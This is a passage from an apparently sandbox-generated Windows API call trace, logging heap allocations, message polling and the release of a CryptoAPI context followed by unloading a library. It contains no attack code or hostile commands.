Size=0x40) returned 0x2e78c00 [0142.486] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0142.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0142.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0142.486] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0142.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0142.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0142.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0142.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0142.486] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0142.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0142.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0142.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0142.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0142.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0142.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0142.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0142.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0142.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0142.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0142.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0142.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0142.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0142.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0142.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0142.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0142.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0142.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0142.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0142.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0142.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0142.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0142.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0142.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0142.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0142.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0142.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0142.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0142.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0142.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0142.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0142.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0142.488] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0142.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0142.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0142.488] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0142.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0142.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0142.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0142.488] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0142.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0142.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0142.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0142.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0142.488] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0142.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0142.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0142.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0142.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0142.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0142.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0142.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0142.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0142.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0142.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0142.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0142.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0142.489] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0142.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0142.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0142.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0142.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0142.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0142.489] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0142.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0142.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0142.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0142.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0142.489] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0142.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0142.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0142.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0142.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0142.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0142.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0142.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0142.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0142.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0142.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0142.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0142.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0142.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0142.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0142.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0142.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0142.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0142.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0142.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0142.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0142.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0142.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0142.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0142.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0142.490] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0142.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0142.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0142.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0142.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0142.491] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0142.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0142.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0142.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0142.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0142.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0142.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0142.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0142.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0142.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0142.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0142.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0142.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0142.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0142.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0142.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0142.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0142.491] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0142.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0142.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0142.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0142.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0142.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0142.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0142.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0142.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0142.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0142.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0142.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0142.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0142.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0142.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0142.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0142.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0142.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0142.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0142.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0142.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0142.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0142.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0142.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0142.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0142.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0142.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0142.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0142.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0142.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0142.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0142.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0142.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0142.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0142.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0142.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0142.493] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0142.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0142.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0142.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0142.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0142.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0142.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0142.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0142.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0142.494] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0142.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0142.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0142.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0142.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0142.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0142.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0142.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0142.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0142.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0142.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0142.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0142.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0142.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0142.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0142.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0142.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0142.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0142.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0142.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0142.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0142.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0142.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0142.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0142.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0142.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0142.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0142.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0142.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0142.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0142.496] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0142.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0142.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0142.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0142.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0142.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0142.496] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0142.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0142.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0142.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0142.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0142.496] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0142.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0142.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0142.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0142.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0142.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0142.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0142.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0142.497] FreeLibrary (hLibModule=0x756e0000) returned 1 [0142.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0142.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 